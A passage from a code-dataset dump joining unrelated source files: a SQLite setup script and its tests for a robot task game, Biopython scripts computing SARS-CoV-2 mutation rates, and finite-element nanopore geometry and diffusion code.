task_1_score INT NOT NULL DEFAULT 0,
task_2_score INT NOT NULL DEFAULT 0,
task_3_score INT NOT NULL DEFAULT 0,
task_4_score INT NOT NULL DEFAULT 0,
task_5_score INT NOT NULL DEFAULT 0,
task_6_score INT NOT NULL DEFAULT 0,
task_7_score INT NOT NULL DEFAULT 0,
task_8_score INT NOT NULL DEFAULT 0,
task_9_score INT NOT NULL DEFAULT 0,
task_10_score INT NOT NULL DEFAULT 0,
task_11_score INT NOT NULL DEFAULT 0,
task_12_score INT NOT NULL DEFAULT 0,
task_13_score INT NOT NULL DEFAULT 0,
task_14_score INT NOT NULL DEFAULT 0,
task_15_score INT NOT NULL DEFAULT 0,
task_16_score INT NOT NULL DEFAULT 0,
FOREIGN KEY(robot_id)
REFERENCES robot(id)
ON UPDATE CASCADE
ON DELETE CASCADE
);
'''
)
cursor.connection.commit()
return True
def main(path: pathlib.Path = pathlib.Path(__file__).parent.parent.joinpath(
"bot_o_mat",
"data",
).resolve()
):
"""Create bot_o_mat.db if it does not already exist in bot_o_mat/data
"""
database_file: pathlib.Path = path.joinpath("bot_o_mat.db").resolve()
if not path.exists():
path.mkdir(exist_ok=True)
if not database_file.is_file():
with sqlite3.connect(database_file) as connection:
print("Opened connection to database successfully\n")
# must enable foreign_keys for each connection
connection.cursor().execute("PRAGMA foreign_keys = 1")
connection.commit()
if initialize_robot_type_table(connection.cursor()):
print("robot type table created and populated")
if initialize_task_table(connection.cursor()):
print("task table created and populated")
if create_robot_table(connection.cursor()):
print("robot table created successfully")
if create_leaderboard_table(connection.cursor()):
print("leaderboard table created successfully")
print(
"\nClosed connection to database successfully",
"\nSQLite Database successfully configured\n"
)
return True
print(f"{database_file} already exists")
if __name__ == "__main__":
main()
sys.exit()
```
#### File: scripts/test/test_setup_db.py
```python
import contextlib
import pathlib
import unittest
import bot_o_mat.utils.db_connect
import scripts.setup_db
data_dir: pathlib.Path = pathlib.Path(__file__).parent.parent.parent.joinpath(
"data"
).resolve()
connection = bot_o_mat.utils.db_connect.open_db(path=data_dir)
class TestSetupDB(unittest.TestCase):
"""Class for unit testing setup_db script
:param unittest: [description]
:type unittest: [type]
"""
def test_initialize_robot_type_table(self):
"""Test 1
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.initialize_robot_type_table(
cursor=cursor
)
self.assertEqual(result, True)
def test_initialize_task_table(self):
"""Test 2
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.initialize_task_table(cursor=cursor)
self.assertEqual(result, True)
def test_create_robot_table(self):
"""Test 3
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.create_robot_table(cursor=cursor)
self.assertEqual(result, True)
def test_create_leaderboard_table(self):
"""Test 4
"""
with contextlib.closing(connection.cursor()) as cursor:
result = scripts.setup_db.create_leaderboard_table(cursor=cursor)
self.assertEqual(result, True)
def test_main(self):
"""this test assumes a non-existent database
"""
pass
if __name__ == "__main__":
unittest.main()
bot_o_mat.utils.db_connect.close_db(connection=connection)
``` |
{
"source": "jhwnkim/covid-mut-rate",
"score": 2
} |
#### File: jhwnkim/covid-mut-rate/data-import-mpi.py
```python
import sys
import traceback
import multiprocessing
from Bio import SeqIO
from Bio import Align
from Bio.Align.substitution_matrices import Array
def get_meta_fasta(record):
import re
tokens = re.split(r'\|', record.description)
metadata = {
'id': record.id,
'collect-date': tokens[-1],
'country': tokens[-2]
}
print(metadata)
return metadata
def mutation_array(seq1, seq2):
aligner = Align.PairwiseAligner()
aligner.mode = 'local'
aligner.match_score = 2
aligner.mismatch_score = -3
aligner.open_gap_score = -7
aligner.extend_gap_score = -2
alignments = aligner.align(seq1, seq2)
alignment = alignments[0]
frequency = Array("ACGTN", dims=2)
for (start1, end1), (start2, end2) in zip(*alignment.aligned):
se1 = seq1[start1:end1]
se2 = seq2[start2:end2]
for c1, c2 in zip(se1, se2):
frequency[c1, c2] += 1
print(frequency)
mut_rate = frequency
print(mut_rate)
return mut_rate
def main():
# Read Covid19 reference sequence
ref = SeqIO.read("./data/ref_sequence.gb", "genbank")
print('Reference Covid sequence')
print(ref.id)
print(repr(ref.seq))
print(len(ref.seq))
# Read downloaded sequence file from NCBI GenBank Virus site
print(sys.argv)
if len(sys.argv) > 1:
infile = sys.argv[1]
else:
infile = "./data/MA-sequences-2-toy.fasta"
records = list( SeqIO.parse(infile, "fasta") )
metadata = []
mutarray = []
import time
start = time.time()
for idx, record in enumerate(records):
print('\n{} of {} records'.format(idx+1, len(records)))
try:
meta = get_meta_fasta(record)
mut = mutation_array(ref.seq, record.seq)
except:
print(traceback.format_exc())
else:
metadata.append(meta)
mutarray.append(mut)
dates = []
mutarray_avg = []
ids = []
for idx, rec in enumerate(metadata):
if len(mutarray_avg) ==0 or rec['collect-date'] > dates[-1]:
dates.append(rec['collect-date'])
ids.append([rec['id']])
mutarray_avg.append(mutarray[idx])
else:
for i in range(len(mutarray_avg)):
if rec['collect-date']< dates[i]:
dates.insert(i, rec['collect-date'])
ids.insert(i,[rec['id']])
mutarray_avg.insert(i, mutarray[idx])
break
elif rec['collect-date'] == dates[i]:
ids[i].append(rec['id'])
mutarray_avg[i] += mutarray[idx]
break
# Divide mutation rate by counts and convert to float Array
mutvec_out = []
for idx, idlist in enumerate(ids):
mutarray_avg[idx] = mutarray_avg[idx]/len(idlist)
print(dates[idx])
print(idlist)
print(mutarray_avg[idx])
mutvec = [ \
mutarray_avg[idx]["A", "C"], \
mutarray_avg[idx]["A", "T"], \
mutarray_avg[idx]["A", "G"], \
mutarray_avg[idx]["C", "A"], \
mutarray_avg[idx]["C", "T"], \
mutarray_avg[idx]["C", "G"], \
mutarray_avg[idx]["T", "A"], \
mutarray_avg[idx]["T", "C"], \
mutarray_avg[idx]["T", "G"], \
mutarray_avg[idx]["G", "A"], \
mutarray_avg[idx]["G", "C"], \
mutarray_avg[idx]["G", "T"]]
mutvec_out.append([float(x) for x in mutvec])
# print('{:e}'.format(mutarray_avg[0]['C', 'T']))
# Save to file
import pandas as pd
# outfile = './data/MA-sequences-1-toy1.csv'
# outfile = './data/MA-sequences-2-toy.csv'
outfile = infile[:-5] + '.csv'
df = pd.DataFrame({"Dates": dates})
df = pd.concat( [df, \
pd.DataFrame(mutvec_out, columns=['A->C', 'A->T', 'A->G', \
'C->A', 'C->T', 'C->G', \
'T->A', 'T->C', 'T->G', \
'G->A', 'G->C', 'G->T'])], axis=1)
df = pd.concat( [df, \
pd.DataFrame({"N": [len(idlist) for idlist in ids]})], axis=1)
print(df)
df.to_csv(outfile, index=False)
print('Run time took {}'.format(time.strftime("%H:%M:%S", time.gmtime(time.time()-start))))
'''
To read data
# load file with pandas
import pandas as pd
outfile = './data/MA-sequences-1-toy1.csv'
df = pd.read_csv(outfile)
# convert to list and numpy array
dates = df['Dates'].values.tolist() # in strings
mutrates = df.iloc[:,1:13].to_numpy()
print(df)
'''
if __name__ == "__main__":
main()
```
#### File: jhwnkim/covid-mut-rate/data-import-muscle.py
```python
from Bio import SeqIO
import traceback
# Read Covid19 reference sequence
ref = SeqIO.read("./data/ref_sequence.gb", "genbank")
print('Reference Covid sequence')
print(ref.id)
print(repr(ref.seq))
print(len(ref.seq))
def get_meta_fasta(record):
import re
tokens = re.split(r'\|', record.description)
metadata = {
'id': record.id,
'collect-date': tokens[-1],
'country': tokens[-2]
}
print(metadata)
return metadata
from Bio import Align
from Bio.Align.substitution_matrices import Array
from Bio.Align.Applications import MuscleCommandline
import subprocess
# muscle_bin = r"/home/gridsan/jhwnkim/git-repo/tools/muscle3.8.31/src/muscle"
# muscle_in = r"/home/gridsan/jhwnkim/tmp/muscle_in.fasta"
# muscle_out= r"/home/gridsan/jhwnkim/tmp/muscle_out.fasta"
muscle_bin = "./muscle3.8.31_i86win32.exe"
muscle_in = "./tmp/muscle_in.fasta"
muscle_out= "./tmp/muscle_out.fasta"
def mutation_array(seq1, seq2): # pass as SeqRecord
SeqIO.write([seq1, seq2], muscle_in, "fasta")
#muscle_cline = MuscleCommandline(muscle_bin, input=muscle_in)
#print(muscle_cline)
#child = subprocess.Popen(muscle_cline, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
muscle_cline = [muscle_bin, "-in", muscle_in]
child = subprocess.Popen(muscle_cline, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
print(muscle_cline)
# aligned_seq = SeqIO.read(muscle_out, "fasta")
aligned_seq = list(SeqIO.parse(child.stdout, "fasta"))
se1 = aligned_seq[0].seq
se2 = aligned_seq[1].seq
frequency = Array("ACGTN-", dims=2)
for c1, c2 in zip(se1, se2):
frequency[c1, c2] += 1
print(frequency)
mut_rate = frequency
#print(mut_rate)
return mut_rate
# Read downloaded sequence file from NCBI GenBank Virus site
infile = "./data/old/MA-sequences-2-toy.fasta"
records = list( SeqIO.parse(infile, "fasta") )
metadata = []
mutarray = []
import time
start = time.time()
for idx, record in enumerate(records):
print('\n{} of {} records'.format(idx+1, len(records)))
try:
meta = get_meta_fasta(record)
mut = mutation_array(ref, record)
except:
print(traceback.format_exc())
else:
metadata.append(meta)
mutarray.append(mut)
dates = []
mutarray_avg = []
ids = []
for idx, rec in enumerate(metadata):
if len(mutarray_avg) ==0 or rec['collect-date'] > dates[-1]:
dates.append(rec['collect-date'])
ids.append([rec['id']])
mutarray_avg.append(mutarray[idx])
else:
for i in range(len(mutarray_avg)):
if rec['collect-date']< dates[i]:
dates.insert(i, rec['collect-date'])
ids.insert(i,[rec['id']])
mutarray_avg.insert(i, mutarray[idx])
break
elif rec['collect-date'] == dates[i]:
ids[i].append(rec['id'])
mutarray_avg[i] += mutarray[idx]
break
# Divide mutation rate by counts and convert to float Array
mutvec_out = []
for idx, idlist in enumerate(ids):
mutarray_avg[idx] = mutarray_avg[idx]/len(idlist)
print(dates[idx])
print(idlist)
print(mutarray_avg[idx])
mutvec = [ \
mutarray_avg[idx]["A", "C"], \
mutarray_avg[idx]["A", "T"], \
mutarray_avg[idx]["A", "G"], \
mutarray_avg[idx]["C", "A"], \
mutarray_avg[idx]["C", "T"], \
mutarray_avg[idx]["C", "G"], \
mutarray_avg[idx]["T", "A"], \
mutarray_avg[idx]["T", "C"], \
mutarray_avg[idx]["T", "G"], \
mutarray_avg[idx]["G", "A"], \
mutarray_avg[idx]["G", "C"], \
mutarray_avg[idx]["G", "T"]]
mutvec_out.append([float(x) for x in mutvec])
# print('{:e}'.format(mutarray_avg[0]['C', 'T']))
# Save to file
import pandas as pd
# outfile = './data/MA-sequences-1-toy1.csv'
# outfile = './data/MA-sequences-2-toy.csv'
outfile = infile[:-5] + '.csv'
df = pd.DataFrame({"Dates": dates})
df = pd.concat( [df, \
pd.DataFrame(mutvec_out, columns=['A->C', 'A->T', 'A->G', \
'C->A', 'C->T', 'C->G', \
'T->A', 'T->C', 'T->G', \
'G->A', 'G->C', 'G->T'])], axis=1)
df = pd.concat( [df, \
pd.DataFrame({"N": [len(idlist) for idlist in ids]})], axis=1)
print(df)
df.to_csv(outfile, index=False)
print('Run time took {}'.format(time.strftime("%H:%M:%S", time.gmtime(time.time()-start))))
'''
To read data
# load file with pandas
import pandas as pd
outfile = './data/MA-sequences-1-toy1.csv'
df = pd.read_csv(outfile)
# convert to list and numpy array
dates = df['Dates'].values.tolist() # in strings
mutrates = df.iloc[:,1:13].to_numpy()
print(df)
'''
``` |
{
"source": "jhwnkim/nanopores",
"score": 2
} |
#### File: nanopores/geometries/allpores.py
```python
import numpy as np
def lazy_import():
global Params, any_params, polygons, MultiPore, Pore, pughpore
global curved, alphahempoly
from nanopores.tools.utilities import Params, any_params
import nanopores.tools.polygons as polygons
from nanopores.geometries.cylpore import MultiPore, Pore
import nanopores.geometries.pughpore as pughpore
import nanopores.geometries.curved as curved
from nanopores.geometries.alphahempoly import poly as alphahempoly
def get_geo(geoname=None, **params):
params["geoname"] = geoname
geoclass = geometries[geoname](**params)
return geoclass.get_geo()
def get_pore(geoname=None, **params):
params["geoname"] = geoname
geoclass = geometries[geoname](**params)
return geoclass.get_pore()
class BasePore(object):
default = dict(
dim = 2,
subs = None,
)
def __init__(self, h=1., reconstruct=False, **params):
lazy_import()
self.params = Params(self.default, **params)
self.h = h
self.reconstruct = reconstruct
def get_geo(self):
return self.build()
def get_pore(self):
pore = self.pore()
pore.build_nogeo()
return pore
class PughPore(BasePore):
@property
def default(self):
return dict(pughpore.params,
geoname = "pugh",
diamPore = 6., # will override l0,.. if set
diamDNA = 2.5, # will override l0,.. if diamPore set
dim = 3,
)
def build(self):
params = self.params
h = self.h
if params.diamPore is not None:
diamPore = params.diamPore # inner (effective) pore diameter
diamDNA = params.diamDNA # dna diameter of outer dna layers
l0 = diamPore + 6.*diamDNA
l1 = diamPore + 4.*diamDNA
l2 = diamPore + 2.*diamDNA
l3 = diamPore
l4 = l1
params.update(l0=l0, l1=l1, l2=l2, l3=l3, l4=l4)
if params.dim == 3:
geo = pughpore.get_geo(h, **params)
if geo.params["x0"] is not None:
molec = curved.Sphere(geo.params["rMolecule"],
geo.params["x0"])
geo.curved = dict(moleculeb = molec.snap)
elif params.dim == 2:
geo = pughpore.get_geo_cyl(h, **params)
if geo.params["x0"] is not None:
molec = curved.Circle(geo.params["rMolecule"],
geo.params["x0"])
geo.curved = dict(moleculeb = molec.snap)
elif params.dim == 1:
geo = pughpore.get_geo1D(h, **params)
return geo
class PughPoreCyl(BasePore):
default = dict(
# specify pore
l0 = 18., #22.5,
l1 = 14., #17.5,
l2 = 10., #12.5,
l3 = 6., #7.5,
l4 = 14., #17.5,
hpore = 46.,
h2 = 46.-35., # 11.
h1 = 46.-35.-2.5, # 8.5
h4 = 10.,
diamPore = 6., # will override l0,.. if set
diamDNA = 2.5, # will override l0,.. if diamPore set
dim = 2,
R = 20.,
H = 70.,
H0 = 60.,
R0 = None,
rMolecule = 2.0779, # molecular radius of protein trypsin
x0 = None,
lcMolecule = 0.2, # relative to global mesh size
lcCenter = 0.5,
hmem = 2.2,
zmem = -46./2. + 2.2/2.,
poreregion = True,
subs = None,
)
def polygon(self):
params = self.params
if params.diamPore is not None:
diamPore = params.diamPore # inner (effective) pore diameter
diamDNA = params.diamDNA # dna diameter of outer dna layers
l0 = diamPore + 6.*diamDNA
l1 = diamPore + 4.*diamDNA
l2 = diamPore + 2.*diamDNA
l3 = diamPore
l4 = l1
params.update(l0=l0, l1=l1, l2=l2, l3=l3, l4=l4)
r = [0.5*params.l3, 0.5*params.l2, 0.5*params.l1, 0.5*params.l0,
0.5*params.l4]
ztop = params.hpore/2.
zbot = -ztop
z = [zbot, ztop - params.h2, ztop - params.h1, ztop, zbot + params.h4]
# indices: [(0,0), (0,1), (1,1), (1,2), ..., (4,4), (4,0)]
n = len(r)
return [(r[i / 2 % n], z[(i+1) / 2 % n]) for i in range(2*n)]
def pore(self):
params = self.params
dna = self.polygon()
pore = MultiPore(**params)
pore.add_polygons(dna=dna)
pore.synonymes = dict(chargeddnab="dnab")
return pore
def build(self):
pore = self.pore()
geo = pore.build(self.h, self.params.subs, self.reconstruct)
return geo
class AlphaHem(BasePore):
default = dict(
dim = 2,
Htop = 7.,
Hbot = 15.,
R = 10.,
cs = [-3, -6],
zmem = -7.625,
proteincs = [-2.3, -4.6, -7.2],
subs = None,
)
def pore(self):
return Pore(alphahempoly, porename="alphahem", **self.params)
def build(self):
pore = self.pore()
geo = pore.build(self.h, self.params.subs, self.reconstruct)
return geo
class WeiPore(BasePore):
default = dict(
R = 120.,
R0 = 100.,
H = 240.,
#H0 = 70.,
x0 = None, #[0, 0, 46],
rMolecule = 6.,
dim = 3,
no_membrane = True,
dp = 45, # (small) pore diameter as used in paper
angle = 40, # aperture angle in degrees
lcCenter = 0.3,
lcMolecule = 0.1,
h = 10.,
subs = None,
reconstruct = False,
poreregion = True,
receptor = None, #[40., 0., -30.],
rReceptor = 1.25,
reverse = True, # if True, narrow opening is at the top, as in paper
)
def polygons(self, params):
lsin = 50. # SiN membrane thickness (in vertical direction)
lau = 40. # Au membrane thickness (in vertical direction)
rlau = 10. # Au thickness in radial direction
lsam = 3. # SAM layer thickness (in vertical direction)
l0 = lau + lsin + lsam
angle2 = params.angle/2. * np.pi/180.
tan = np.tan(angle2)
sin = np.sin(angle2)
cos = np.cos(angle2)
l = l0/2.
r0 = params.dp/2. - lsam
r1 = r0 + l0*tan
rsam = r0 + lsam/cos
rsin = r0 + lsam/cos + rlau
R = params.R
split = 0.7
Rsplit = split*R + (1.-split)*r1
if not params.reverse:
sam = [[r0, -l], [r1, l], [R, l], [R, l - lsam],
[rsam - tan*(lsam - l0), l - lsam], [rsam, -l]]
au = [sam[5], sam[4], sam[3], [R, -l + lsin],
[rsin + tan*lsin, -l + lsin],
[rsin, -l]]
sin = [au[5], au[4], au[3], [R, -l]]
else:
l = -l
sam = [[r0, -l], [r1, l], [R, l], [R, l + lsam],
[rsam - tan*(lsam - l0), l + lsam], [rsam, -l]][::-1]
au = [sam[-6], sam[-5], sam[-4], [R, -l - lsin],
[rsin + tan*lsin, -l - lsin],
[rsin, -l]][::-1]
sin = [au[-6], au[-5], au[-4], [R, -l]][::-1]
return sam, au, sin, Rsplit
def pore(self):
params = self.params
sam, au, sin, Rsplit = self.polygons(params)
sam, unchargedsam = polygons.Polygon(sam).split(Rsplit)
au, unchargedau = polygons.Polygon(au).split(Rsplit)
sin, unchargedsin = polygons.Polygon(sin).split(Rsplit)
pore = MultiPore(**params)
pore.add_polygons(chargedsam=sam, chargedau=au, chargedsin=sin,
unchargedsam=unchargedsam, unchargedau=unchargedau,
unchargedsin=unchargedsin)
pore.synonymes = dict(
sam={"chargedsam", "unchargedsam"},
au={"chargedau", "unchargedau"},
sin={"chargedsin", "unchargedsin"},)
if params.receptor is not None:
receptor = polygons.Ball(params.receptor, params.rReceptor, lc=0.1)
pore.add_balls(receptor=receptor)
return pore
def build(self):
pore = self.pore()
geo = pore.build(self.h, self.params.subs, self.reconstruct)
return geo
geometries = dict(
wei = WeiPore,
pugh = PughPore,
pughcyl = PughPoreCyl,
alphahem = AlphaHem,
)
if __name__ == "__main__":
lazy_import()
params = any_params(geoname="wei", h=10.)
geo = get_geo(**params)
print('geo')
#print(geo)
#print geo.mesh.coordinates()
geo.plot_subdomains()
geo.plot_boundaries(interactive=True)
```
#### File: geometries/Cyl2D/subdomains.py
```python
from dolfin import *
from .params_geo import *
from math import sqrt, pow
def subdomain_list(**params):
globals().update(params)
return [Fluid(), Molecule()]
def boundaries_list(**params):
globals().update(params)
return [Upper(), Lower(), Side(), MoleculeB()]
synonymes = {
"solid":"molecule",
"ions":"fluid",
"noslip":{"upper","lower","side"},
"nopressure":{"upper"},
"inflow":{"moleculeb"},
}
synonymes2 = {
"solid":"molecule",
"ions":"fluid",
"noslip":{"side"},
"nopressure":{"upper"},
"inflow":{"moleculeb"},
}
synonymes0 = {
"solid":"molecule",
"ions":"fluid",
"inflow":{"upper","lower","side"},
"nopressure":{"upper"},
"noslip":{"moleculeb"},
}
def norm2(x, y, z=0.0):
return sqrt(pow(x,2) + pow(y,2) + pow(z,2))
class Fluid(SubDomain):
def inside(self, x, on_boundary):
return True # other domains will overwrite
class Molecule(SubDomain):
def inside(self, x, on_boundary):
return norm2(x[0], x[1]-z0) <= r + tolc
# exterior fluid boundaries
class Upper(SubDomain):
def inside(self, x, on_boundary):
return x[1] >= l/2 - tolc
class Lower(SubDomain):
def inside(self, x, on_boundary):
return x[1] <= -l/2 + tolc
class Side(SubDomain):
def inside(self, x, on_boundary):
return x[0] >= R - tolc
class MoleculeB(SubDomain):
def inside(self, x, on_boundary):
return near(norm2(x[0], x[1]-z0), r)
```
#### File: geometries/H_geo/subdomains.py
```python
from dolfin import *
from math import sqrt, pow
from . import params_geo
synonymes = {
"bulkfluid": {"bulkfluidtop", "bulkfluidbottom"},
"fluid":{"bulkfluid","pore"},
"pore":{"poretop", "porecenter", "porebottom"},
"lipid":"membrane",
"solid":{"dna", "membrane", "molecule"},
"ions":"fluid",
"bulk":{"upperb","lowerb"}, #,"rightfluidb"},
"sideb":"rightfluidb",
"memb":"membraneb",
"chargeddnab":{"chargeddnainb","chargeddnaoutb"},
"dnab":{"chargeddnab","unchargeddnab"},
"noslip":{"dnab","membraneb"}, #"moleculeb"},
"nopressure":{"upperb","lowerb"},
#"charged":{"chargeddnab","moleculeb","membraneb"},
"ground":"upperb",
"bV":"lowerb",
"chargedmembraneb":"membraneb",
}
def norm2(x, y):
return sqrt(pow(x,2) + pow(y,2))
# lists containing subdomain classes, ordering is important: fluid first, molecule last
def subdomain_list(**params):
tmp = vars(params_geo)
params.update({key:tmp[key] for key in tmp \
if (not key in params and not key.startswith("__"))})
tolc = params["tolc"]
try:
x0 = params["x0"]
except (KeyError, NameError):
x0 = None
# subdomains
class BulkFluidTop(SubDomain):
def inside(self, x, on_boundary):
return x[1] > -tolc # other domains will overwrite
class BulkFluidBottom(SubDomain):
def inside(self, x, on_boundary):
return x[1] < tolc # other domains will overwrite
class Molecule(SubDomain):
def inside(self, x, on_boundary):
if x0 is not None:
return norm2(x[0], x[1]-x0[2]) <= params["rMolecule"] +tolc
else:
return False
#class MoleculeHull(SubDomain):
# def inside(self, x, on_boundary):
# if x0 is not None:
# return norm2(x[0], x[1]-x0[2]) <= params["rMolecule"] + params["rMH"] +tolc
# else:
# return False
class DNA(SubDomain):
def inside(self, x, on_boundary):
return (x[0] >= (params["r0"] - tolc) and x[0] <= (params["r1"] +tolc) \
and (abs(x[1])-tolc) <= 0.5*params["l0"])
class Membrane(SubDomain):
def inside(self, x, on_boundary):
return (x[0] >= (params["r1"] -tolc) and x[0] <= params["Rx"] \
and abs(x[1]) -tolc <= params["l1"]/2 )
# partion pore into three subdomains
class PoreTop(SubDomain):
def inside(self, x, on_boundary):
return (between(x[1],(params["l1"]/2, params["l0"]/2)) and between(x[0], (0,params["r0"])))
class PoreCenter(SubDomain):
def inside(self, x, on_boundary):
return (between(x[1],(-params["l1"]/2, params["l1"]/2)) and between(x[0], (0,params["r0"])))
class PoreBottom(SubDomain):
def inside(self, x, on_boundary):
return (between(x[1],(-params["l0"]/2,-params["l1"]/2)) and between(x[0], (0,params["r0"])))
return [BulkFluidTop(), BulkFluidBottom(), DNA(), Membrane(),
PoreTop(), PoreCenter(), PoreBottom(), Molecule(),]
def boundaries_list(**params):
tmp = vars(params_geo)
params.update({key:tmp[key] for key in tmp \
if (not key in params and not key.startswith("__"))})
tolc = params["tolc"]
try:
x0 = params["x0"]
except (KeyError, NameError):
x0 = None
# exterior fluid boundaries
class UpperB(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and near(x[1], params["Ry"])
class LowerB(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and near(x[1], -params["Ry"])
class LeftFluidB(SubDomain):
def inside(self, x, on_boundary):
if x0 is not None:
return on_boundary and near(x[0], 0) and \
not between(x[1], (x0[2] - params["rMolecule"], x0[2] + params["rMolecule"]))
else:
return on_boundary and near(x[0], 0)
class RightFluidB(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and near(x[0], params["Rx"]) and abs(x[1]) >= params["l1"]/2 -tolc
# DNA boundaries
class ChargedDNAinB(SubDomain):
def inside(self, x, on_boundary):
return between(x[0], (params["r0"] -tolc, params["r0"] +tolc)) \
and between(abs(x[1]), ( -tolc, params["l0"]/2 +tolc))
class ChargedDNAoutB(SubDomain):
def inside(self, x, on_boundary):
return between(x[0], (params["r1"] -tolc, params["r1"] +tolc)) \
and between(abs(x[1]), (params["l1"]/2 -tolc, params["l0"]/2 +tolc))
class UnchargedDNAB(SubDomain):
def inside(self, x, on_boundary):
return ( between(x[0], (params["r0"] -tolc, params["r1"] +tolc)) \
and near(abs(x[1]), params["l0"]/2) )
#return ( ( near(x[0], params["r0"]) and between( x[1], (-params["l1"]/2 -tolc, params["l1"]/2 + tolc) ) ) \
# or ( between(x[0], (params["r0"] -tolc, params["r1"] +tolc)) and near(abs(x[1]), params["l0"]/2) ) )
# Molecule boundaries
class MoleculeB(SubDomain):
def inside(self, x, on_boundary):
if x0 is not None:
return between(norm2(x[0], x[1]-x0[2]), (params["rMolecule"] -tolc, params["rMolecule"] +tolc) )
else:
return False
# Membrane boundaries
class MembraneB(SubDomain):
def inside(self, x, on_boundary):
return between(x[0], (params["r1"] -tolc, params["Rx"] +tolc)) and near(abs(x[1]), params["l1"]/2)
# cross-section interfaces
class CrossTop2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],params["l0"]/2) and between(x[0],(0,params["r0"])))
class CrossCenterTop2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],params["l1"]/2) and between(x[0],(0,params["r0"])))
class CrossCenterBottom2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],-params["l1"]/2) and between(x[0],(0,params["r0"])))
class CrossBottom2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],-params["l0"]/2) and between(x[0],(0,params["r0"])))
return [UpperB(), LowerB(), LeftFluidB(), RightFluidB(),
ChargedDNAinB(), ChargedDNAoutB(), UnchargedDNAB(), MembraneB(),
CrossTop2D(), CrossCenterTop2D(), CrossCenterBottom2D(), CrossBottom2D(), MoleculeB(),]
#the following code seems to be only needed for backward compatibility
# get MeshFunctions
# def get_subdomain(mesh):
# subdomain = CellFunction("size_t", mesh, 0)
# for i,sub in enumerate(subdomain_list()):
# sub.mark(subdomain, i+1)
# return subdomain
# def get_boundaries(mesh):
# boundaries = FacetFunction("size_t", mesh, 0)
# UpperB().mark(boundaries, 11)
# LowerB().mark(boundaries, 12)
# LeftFluidB().mark(boundaries, 13)
# RightFluidB().mark(boundaries, 14)
# ChargedDNAinB().mark(boundaries, 21)
# ChargedDNAoutB().mark(boundaries, 22)
# UnchargedDNAB().mark(boundaries, 23)
# MembraneB().mark(boundaries, 31)
# #MoleculeB(x0).mark(boundaries, 41, False)
# return boundaries
# def get_porepartitions(mesh, x0):
# crosssections = get_subdomain(mesh, x0)
# PoreTop().mark(crosssections, 51, False)
# PoreCenter().mark(crosssections, 52, False)
# PoreBottom().mark(crosssections, 53, False)
# Molecule(x0).mark(crosssections, 4)
# return crosssections
# # get piecewise constant (pwc) function on subdomains (e.g. permittivity)
# # specified by list/array either as CellFunction or as DG0 Function
# class CellFunction2Expression(Expression):
# def __init__(self, cellfun):
# self.cellfun = cellfun
# def eval_cell(self, values, x, cell):
# values[0] = self.cellfun[cell.index]
# def get_pwc_cellfun(mesh,somearray):
# cellfun = CellFunction("double", mesh)
# for i,sub in enumerate(subdomain_list()):
# sub.mark(cellfun, somearray[i])
# return cellfun
# def get_pwc_DG(mesh,somearray):
# cellfun = get_pwc_cellfun(mesh,somearray)
# expr = CellFunction2Expression(cellfun)
# dgfun = Function(FunctionSpace(mesh,"DG",0))
# dgfun.interpolate(expr)
# return dgfun
# def get_permittivity_DG(mesh):
# return get_pwc_DG(mesh,perm)
# def get_diffusion_DG(mesh):
# return get_pwc_DG(mesh,diff)
```
#### File: nanopores/models/diffusion_helpers.py
```python
from itertools import product
import numpy as np
import dolfin
from nanopores.tools import fields
def Dt_plane(h, r):
x = r/h
return 1. - 9./16.*x + 1./8.*x**3 - 45./256.*x**4 - 1/16.*x**5
sinh = np.sinh
acosh = np.arccosh
def Dn_plane(l, r, N=100):
alpha = acosh(l/r)
s = 0.
for n in range(1, N):
n = float(n)
K = n*(n+1)/(2*n-1)/(2*n+3)
s += K*((2*sinh((2*n+1)*alpha)+(2*n+1)*sinh(2*alpha))/(4*(sinh((n+.5)*alpha))**2-(2*n+1)**2*(sinh(alpha))**2) - 1)
return 1./((4./3.)*sinh(alpha)*s)
def set_D_with_protein(setup):
meshp = setup.geo.mesh # mesh WITH protein
x0 = np.array(setup.geop.x0)
dim = setup.phys.dim
x0 = x0 if dim==3 else x0[::2]
r0 = setup.geop.rMolecule
rion = 0.11
# load diffusivity on mesh without protein
functions, mesh = fields.get_functions(**setup.solverp.diffusivity_data)
#dist = functions["dist"]
D0 = functions["D"]
# evaluate dist, D on meshp nodes
#Vp = dolfin.FunctionSpace(meshp, "CG", 1)
VVp = dolfin.VectorFunctionSpace(meshp, "CG", 1)
#distp_ = dolfin.interpolate(dist, Vp)
D0p_ = dolfin.interpolate(D0, VVp)
#distp = distp_.vector()[dolfin.vertex_to_dof_map(Vp)]
D0p = D0p_.vector()[dolfin.vertex_to_dof_map(VVp)]
D0p = np.column_stack([D0p[i::dim] for i in range(dim)])
x = meshp.coordinates()
# first create (N,3,3) array from D0 (N,3)
N = len(D0p)
Da = np.zeros((N, dim, dim))
i3 = np.array(range(dim))
Da[:, i3, i3] = D0p
# modify (N,3,3) array to include protein interaction
R = x - x0
r = np.sqrt(np.sum(R**2, 1))
overlap = r < rion + r0
#near = ~overlap & (r - r0 < distp)
h = np.maximum(r - r0, rion)
eps = 1e-2
D00 = setup.phys.D
Dt = np.zeros_like(r)
Dn = np.zeros_like(r)
Dt[overlap] = eps
Dn[overlap] = eps
Dt[~overlap] = Dt_plane(h[~overlap], rion)
Dn[~overlap] = Dn_plane(h[~overlap], rion, N=20)
# D(R) = Dn(h) RR^T + Dt(h) (I - RR^T) where R is normalized
R0 = R/(r[:, None] + 1e-100)
RR = (R0[:, :, None] * R0[:, None, :])
I = np.zeros((N, dim, dim))
I[:, i3, i3] = 1.
Dpp = D00*(Dn[:, None, None] * RR + Dt[:, None, None] * (I - RR))
near = Dpp[:, dim-1, dim-1] < Da[:, dim-1, dim-1]
Da[near] = Dpp[near]
# assign final result to dolfin P1 TensorFunction
VVV = dolfin.TensorFunctionSpace(meshp, "CG", 1, shape=(dim, dim))
D = dolfin.Function(VVV)
v2d = dolfin.vertex_to_dof_map(VVV)
Dv = D.vector()
